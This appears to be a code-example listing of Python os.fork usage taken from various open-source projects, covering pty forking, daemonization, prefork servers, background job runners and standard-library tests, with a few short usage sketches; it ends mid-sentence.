def fork_pty():
    '''This implements a substitute for the forkpty system call. This
    should be more portable than the pty.fork() function. Specifically,
    this should work on Solaris.

    Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
    resolve the issue with Python's pty.fork() not supporting Solaris,
    particularly ssh. Based on patch to posixmodule.c authored by Noah
    Spurrier::

        http://mail.python.org/pipermail/python-dev/2003-May/035281.html

    '''

    parent_fd, child_fd = os.openpty()
    if parent_fd < 0 or child_fd < 0:
        raise OSError("os.openpty() failed")

    pid = os.fork()
    if pid == CHILD:
        # Child.
        os.close(parent_fd)
        pty_make_controlling_tty(child_fd)

        os.dup2(child_fd, STDIN_FILENO)
        os.dup2(child_fd, STDOUT_FILENO)
        os.dup2(child_fd, STDERR_FILENO)

    else:
        # Parent.
        os.close(child_fd)

    return pid, parent_fd 
Example 48
Project: Repobot   Author: Desgard   File: _fork_pty.py    MIT License
def pty_make_controlling_tty(tty_fd):
    '''This makes the pseudo-terminal the controlling tty. This should be
    more portable than the pty.fork() function. Specifically, this should
    work on Solaris. '''

    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty, if any.  Raises OSError of ENXIO
    # if there was no controlling tty to begin with, such as when
    # executed by a cron(1) job.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        os.close(fd)
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    os.setsid()

    # Verify we are disconnected from controlling tty by attempting to open
    # it again.  We expect that OSError of ENXIO should always be raised.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        os.close(fd)
        raise ExceptionPexpect("OSError of errno.ENXIO should be raised.")
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    # Verify we can open child pty.
    fd = os.open(child_name, os.O_RDWR)
    os.close(fd)

    # Verify we now have a controlling tty.
    fd = os.open("/dev/tty", os.O_WRONLY)
    os.close(fd) 
Example 49
Project: ssrspeed_backup   Author: mazhenting   File: daemon.py    GNU General Public License v3.0
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIGHUP, signal.SIG_IGN)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 50
Project: cb4   Author: joint-online-judge   File: server.py    GNU Affero General Public License v3.0
def main():
  if not options.syslog:
    coloredlogs.install(level=logging.DEBUG if options.debug else logging.INFO,
                        fmt='[%(levelname).1s %(asctime)s %(module)s:%(lineno)d] %(message)s',
                        datefmt='%y%m%d %H:%M:%S')
  else:
    syslog.enable_system_logging(level=logging.DEBUG if options.debug else logging.INFO,
                                 fmt='vj4[%(process)d] %(programname)s %(levelname).1s %(message)s')
  logging.getLogger('sockjs').setLevel(logging.WARNING)
  url = urllib.parse.urlparse(options.listen)
  if url.scheme == 'http':
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
    host, port_str = url.netloc.rsplit(':', 1)
    sock.bind((host, int(port_str)))
  elif url.scheme == 'unix':
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
      os.remove(url.path)
    except FileNotFoundError:
      pass
    sock.bind(url.path)
  else:
    _logger.error('Invalid listening scheme %s', url.scheme)
    return 1
  for i in range(1, options.prefork):
    pid = os.fork()
    if not pid:
      break
    else:
      atexit.register(lambda pid=pid: os.kill(pid, signal.SIGTERM))  # bind pid now; a bare closure would capture only the last child
  web.run_app(app.Application(), sock=sock, access_log=None, shutdown_timeout=0) 
Example 51
Project: shadowsocksr   Author: dsmnoi   File: daemon.py    Apache License 2.0
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIGHUP, signal.SIG_IGN)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 52
Project: chattR   Author: patrickstocklin   File: daemonize.py    GNU General Public License v2.0
def become_daemon(our_home_dir='.', out_log='/dev/null',
                      err_log='/dev/null', umask=0o022):
        "Robustly turn into a UNIX daemon, running in our_home_dir."
        # First fork
        try:
            if os.fork() > 0:
                sys.exit(0)     # kill off parent
        except OSError as e:
            sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
            sys.exit(1)
        os.setsid()
        os.chdir(our_home_dir)
        os.umask(umask)

        # Second fork
        try:
            if os.fork() > 0:
                os._exit(0)
        except OSError as e:
            sys.stderr.write("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
            os._exit(1)

        si = open('/dev/null', 'r')
        so = open(out_log, 'a+', buffering)  # 'buffering' comes from module scope in the original file
        se = open(err_log, 'a+', buffering)
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())
        # Set custom file descriptors so that they get proper buffering.
        sys.stdout, sys.stderr = so, se 
Example 53
Project: restrain-jit   Author: thautwarm   File: utils.py    MIT License
def exec_cc(cmd, args):
    """
    Execute with current context.
    Yes, you're right -- I'm naming it after call/cc.

    Return a generator.
        The first yielded one is the status of
        the execution of subprocess command.

        The following ones are the buffer batches of stderr,
        each of which is a Python 'bytes' object
    """
    file = cmd
    err_in, err_out = os.pipe()
    out_in, out_out = os.pipe()
    if os.fork():
        _, status = os.wait()
        os.close(err_out)
        os.close(out_out)
        yield status
        while True:
            load = os.read(err_in, 1024)
            if not load:
                break
            yield load
    else:
        # for child process
        os.close(err_in)
        os.close(out_in)
        os.dup2(err_out, sys.stderr.fileno())
        os.dup2(out_out, sys.stdout.fileno())

        os.execvpe(file, [cmd, *args], dict(os.environ))
        # in case that os.execvp fails
        sys.exit(127) 
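A hypothetical usage sketch (the command is invented for illustration): the first value yielded is the child's exit status, and the remaining yields are stderr chunks:

gen = exec_cc('cc', ['--version'])
status = next(gen)      # exit status from os.wait()
stderr = b''.join(gen)  # remaining yields are stderr batches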
Example 54
Project: docker-ssr-client   Author: storezhang   File: daemon.py    Apache License 2.0
def daemon_start(pid_file, log_file):

    def handle_exit(signum, _):
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIGHUP, signal.SIG_IGN)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1) 
Example 55
Project: PythonRpcCode   Author: mtianyan   File: multiprocess.py    Apache License 2.0
def loop(sock, handlers):
    while True:
        conn, addr = sock.accept()
        pid = os.fork()  # the key step: fork a child process to handle the new connection
        if pid < 0:  # fork error
            return
        if pid > 0:  # parent process
            conn.close()  # close the client socket in the parent
            continue
        if pid == 0:
            sock.close()  # close the listening socket in the child
            handle_conn(conn, addr, handlers)
            break  # the child must leave the loop when done, or it would keep accepting connections too
Example 56
Project: PythonRpcCode   Author: mtianyan   File: async_prefork.py    Apache License 2.0
def prefork(self, n):
        for i in range(n):
            pid = os.fork()
            if pid < 0:  # fork error
                return
            if pid > 0:  # parent process
                continue
            if pid == 0:
                break  # child process 
Example 57
Project: PythonRpcCode   Author: mtianyan   File: server.py    Apache License 2.0
def prefork(self, n):
        for i in range(n):
            pid = os.fork()
            if pid < 0:  # fork error
                raise
            if pid > 0:  # parent process
                self.child_pids.append(pid)
                continue
            if pid == 0:
                return False  # child process
        return True 
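A hypothetical caller sketch for the prefork() above (everything except prefork and child_pids is invented): the parent receives True and reaps its workers, while each child receives False and runs the serving loop:

if server.prefork(4):
    for pid in server.child_pids:
        os.waitpid(pid, 0)  # parent: wait for the worker processes
else:
    serve_loop()            # child: hypothetical per-worker accept loop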
Example 58
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 59
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
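A hypothetical usage sketch (job name and command invented for illustration):

retcode = run_in_background('update_feed',
                            ['/usr/bin/python', 'update_feed.py'])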
Example 60
Project: alfred-yubikey-otp   Author: robertoriv   File: background.py    MIT License
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 61
Project: pyblish-win   Author: pyblish   File: pty.py    GNU Lesser General Public License v3.0
def fork():
    """fork() -> (pid, master_fd)
    Fork and make the child a session leader with a controlling terminal."""

    try:
        pid, fd = os.forkpty()
    except (AttributeError, OSError):
        pass
    else:
        if pid == CHILD:
            try:
                os.setsid()
            except OSError:
                # os.forkpty() already set us session leader
                pass
        return pid, fd

    master_fd, slave_fd = openpty()
    pid = os.fork()
    if pid == CHILD:
        # Establish a new session.
        os.setsid()
        os.close(master_fd)

        # Slave becomes stdin/stdout/stderr of child.
        os.dup2(slave_fd, STDIN_FILENO)
        os.dup2(slave_fd, STDOUT_FILENO)
        os.dup2(slave_fd, STDERR_FILENO)
        if (slave_fd > STDERR_FILENO):
            os.close (slave_fd)

        # Explicitly open the tty to make it become a controlling tty.
        tmp_fd = os.open(os.ttyname(STDOUT_FILENO), os.O_RDWR)
        os.close(tmp_fd)
    else:
        os.close(slave_fd)

    # Parent and child process.
    return pid, master_fd 
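A minimal usage sketch of the fork() defined above (it mirrors the standard pty.fork() API; the command is chosen for illustration):

pid, master_fd = fork()
if pid == CHILD:
    # Child: stdin/stdout/stderr are now the slave end of the pty.
    os.execvp('ls', ['ls'])
else:
    # Parent: read the child's terminal output, then reap it.
    output = os.read(master_fd, 1024)
    os.waitpid(pid, 0)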
Example 62
Project: pyblish-win   Author: pyblish   File: spawn.py    GNU Lesser General Public License v3.0
def _spawn_posix(cmd, search_path=1, verbose=0, dry_run=0):
    log.info(' '.join(cmd))
    if dry_run:
        return
    executable = cmd[0]
    exec_fn = search_path and os.execvp or os.execv
    env = None
    if sys.platform == 'darwin':
        global _cfg_target, _cfg_target_split
        if _cfg_target is None:
            _cfg_target = sysconfig.get_config_var(
                                  'MACOSX_DEPLOYMENT_TARGET') or ''
            if _cfg_target:
                _cfg_target_split = [int(x) for x in _cfg_target.split('.')]
        if _cfg_target:
            # ensure that the deployment target of build process is not less
            # than that used when the interpreter was built. This ensures
            # extension modules are built with correct compatibility values
            cur_target = os.environ.get('MACOSX_DEPLOYMENT_TARGET', _cfg_target)
            if _cfg_target_split > [int(x) for x in cur_target.split('.')]:
                my_msg = ('$MACOSX_DEPLOYMENT_TARGET mismatch: '
                          'now "%s" but "%s" during configure'
                                % (cur_target, _cfg_target))
                raise DistutilsPlatformError(my_msg)
            env = dict(os.environ,
                       MACOSX_DEPLOYMENT_TARGET=cur_target)
            exec_fn = search_path and os.execvpe or os.execve
    pid = os.fork()

    if pid == 0:  # in the child
        try:
            if env is None:
                exec_fn(executable, cmd)
            else:
                exec_fn(executable, cmd, env)
        except OSError as e:
            if not DEBUG:
                cmd = executable
            sys.stderr.write("unable to execute %r: %s\n" %
                             (cmd, e.strerror))
            os._exit(1)

        if not DEBUG:
            cmd = executable
        sys.stderr.write("unable to execute %r for unknown reasons" % cmd)
        os._exit(1) 
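
The fork/exec/_exit pattern in _spawn_posix() above, reduced to a minimal standalone sketch (using os.WEXITSTATUS to decode the wait status):

    import os
    import sys

    pid = os.fork()
    if pid == 0:
        # Child: replace the process image; on failure _exit() immediately
        # so the parent's buffers and atexit handlers never run twice.
        try:
            os.execvp('true', ['true'])
        except OSError as e:
            sys.stderr.write('unable to execute: %s\n' % e.strerror)
            os._exit(1)
    else:
        # Parent: reap the child and decode the 16-bit wait status.
        _, status = os.waitpid(pid, 0)
        print('child exited with', os.WEXITSTATUS(status))
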
Example 64
Project: pyblish-win   Author: pyblish   File: test_signal.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def readpipe_interrupted(self):
        """Perform a read during which a signal will arrive.  Return True if the
        read is interrupted by the signal and raises an exception.  Return False
        if it returns normally.
        """
        # Create a pipe that can be used for the read.  Also clean it up
        # when the test is over, since nothing else will (but see below for
        # the write end).
        r, w = os.pipe()
        self.addCleanup(os.close, r)

        # Create another process which can send a signal to this one to try
        # to interrupt the read.
        ppid = os.getpid()
        pid = os.fork()

        if pid == 0:
            # Child code: sleep to give the parent enough time to enter the
            # read() call (there's a race here, but it's really tricky to
            # eliminate it); then signal the parent process.  Also, sleep
            # again to make it likely that the signal is delivered to the
            # parent process before the child exits.  If the child exits
            # first, the write end of the pipe will be closed and the test
            # is invalid.
            try:
                time.sleep(0.2)
                os.kill(ppid, self.signum)
                time.sleep(0.2)
            finally:
                # No matter what, just exit as fast as possible now.
                exit_subprocess()
        else:
            # Parent code.
            # Make sure the child is eventually reaped, else it'll be a
            # zombie for the rest of the test suite run.
            self.addCleanup(os.waitpid, pid, 0)

            # Close the write end of the pipe.  The child has a copy, so
            # it's not really closed until the child exits.  We need it to
            # close when the child exits so that in the non-interrupt case
            # the read eventually completes, otherwise we could just close
            # it *after* the test.
            os.close(w)

            # Try the read and report whether it is interrupted or not to
            # the caller.
            try:
                d = os.read(r, 1)
                return False
            except OSError as err:
                if err.errno != errno.EINTR:
                    raise
                return True 
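
For reference, the manual retry idiom this test exercises; a sketch, not part of the test itself:

    import errno
    import os

    def read_retrying_on_eintr(fd, n):
        # Manual EINTR handling, the behaviour the test above probes.
        # Python 3.5+ retries interrupted syscalls automatically (PEP 475),
        # so this loop is only needed on older interpreters.
        while True:
            try:
                return os.read(fd, n)
            except OSError as err:
                if err.errno != errno.EINTR:
                    raise
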
Example 65
Project: pyblish-win   Author: pyblish   File: test_threading.py    GNU Lesser General Public License v3.0 4 votes vote down vote up
def test_5_clear_waiter_locks_to_avoid_crash(self):
        # Check that a spawned thread that forks doesn't segfault on certain
        # platforms, namely OS X.  This used to happen if there was a waiter
        # lock in the thread's condition variable's waiters list.  Even though
        # we know the lock will be held across the fork, it is not safe to
        # release locks held across forks on all platforms, so releasing the
        # waiter lock caused a segfault on OS X.  Furthermore, since locks on
        # OS X are (as of this writing) implemented with a mutex + condition
        # variable instead of a semaphore, while we know that the Python-level
        # lock will be acquired, we can't know if the internal mutex will be
        # acquired at the time of the fork.

        script = """if True:
            import os, time, threading

            start_fork = False

            def worker():
                # Wait until the main thread has attempted to join this thread
                # before continuing.
                while not start_fork:
                    time.sleep(0.01)
                childpid = os.fork()
                if childpid != 0:
                    # Parent process just waits for child.
                    (cpid, rc) = os.waitpid(childpid, 0)
                    assert cpid == childpid
                    assert rc == 0
                    print('end of worker thread')
                else:
                    # Child process should just return.
                    pass

            w = threading.Thread(target=worker)

            # Stub out the private condition variable's _release_save method.
            # This releases the condition's lock and flips the global that
            # causes the worker to fork.  At this point, the problematic waiter
            # lock has been acquired once by the waiter and has been put onto
            # the waiters list.
            condition = w._block
            orig_release_save = condition._release_save
            def my_release_save():
                global start_fork
                orig_release_save()
                # Waiter lock held here, condition lock released.
                start_fork = True
            condition._release_save = my_release_save

            w.start()
            w.join()
            print('end of main thread')
            """
        output = "end of worker thread\nend of main thread\n"
        self.assertScriptHasOutput(script, output) 
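
On Python 3.7+, os.register_at_fork() offers a supported hook for resetting state such as locks after fork(); a brief sketch, not part of the test above:

    import os
    import threading

    lock = threading.Lock()

    def _fresh_locks_in_child():
        # Replace any lock whose state is unknowable after fork().
        global lock
        lock = threading.Lock()

    os.register_at_fork(after_in_child=_fresh_locks_in_child)
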
Example 66
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
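
A hypothetical companion helper (not part of the module above) that reads back the PID _background() wrote:

    import os

    def job_pid(pidfile):
        # Read back the PID that _background() wrote; None means the daemon
        # never started or its pidfile has already been cleaned up.
        if not os.path.exists(pidfile):
            return None
        with open(pidfile, 'rb') as fp:
            return int(fp.read())
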
Example 67
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 68
Project: wechat-alfred-workflow   Author: TKkk-iOSer   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 69
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 70
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 71
Project: alfred-urban-dictionary   Author: xilopaint   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 72
Project: efre-lod-elasticsearch-tools   Author: slub   File: es2json.py    Apache License 2.0 4 votes vote down vote up
def daemonize(self):
        """
        Do the UNIX double-fork magic; see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177).
        http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try: 
            pid = os.fork() 
            if pid > 0:
                # exit first parent
                sys.exit(0) 
        except OSError as e: 
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

        # decouple from parent environment
        os.chdir("/") 
        os.setsid() 
        os.umask(0) 

        # do second fork
        try: 
            pid = os.fork() 
            if pid > 0:
                # exit from second parent
                sys.exit(0) 
        except OSError as e: 
            sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1) 
    
        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = open(self.stdin, 'r')
        so = open(self.stdout, 'a+')
        se = open(self.stderr, 'a+')
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())

        # write pidfile
        atexit.register(self.delpid)
        pid = str(os.getpid())
        with open(self.pidfile,'w+') as pf:
            pf.write("%s\n" % pid) 
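
daemonize() above is a method and assumes several instance attributes; a minimal sketch of the surrounding class contract, with attribute names inferred from the body:

    import os

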